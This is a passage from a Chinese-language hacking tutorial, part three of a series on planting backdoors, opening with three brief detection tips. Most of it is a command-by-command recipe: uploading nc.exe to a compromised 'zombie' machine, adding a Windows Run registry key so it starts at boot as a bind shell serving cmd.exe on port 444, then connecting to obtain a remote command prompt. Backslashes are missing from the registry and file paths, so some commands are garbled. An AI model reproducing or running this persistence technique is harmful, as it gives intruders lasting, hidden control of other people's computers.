后门是怎样植入的(3)

从图中可以看出，重启之后，会话又被成功建立起来了。
检测后门
(1)查看相应的目录是否有可疑的vbs。 (2)查看可疑端口 (3)查看可疑的开机启动项
nc后门
建立nc后门
nc.exe具有"瑞士军刀"的美名，其在反向连接方面的功能可以用强大甚至恐怖来形容。
上传nc后门到"肉鸡"
upload /usr/share/windows-binaries/nc.exe C:windowssystem32
枚举注册表内容（开机启动），注册表相关的内容在前面有介绍。
reg enumkey -k HKLMsoftwaremicrosoftwindowscurrentversion un
在该注册表增加内容（开机启动）
reg setval -k HKLMsoftwaremicrosoftwindowscurrentversion un -v nc -d "C:windowssystem32 c.exe -Ldp 444 -e cmd.exe"
查看内容
reg queryval -k HKLMsoftwaremicrosoftwindowscurrentversionRun -v nc
具体过程如下:

重启"肉鸡"，通过nc连接
nc 192.168.42.40 444
成功连接后，能够获得肉鸡的cmd终端：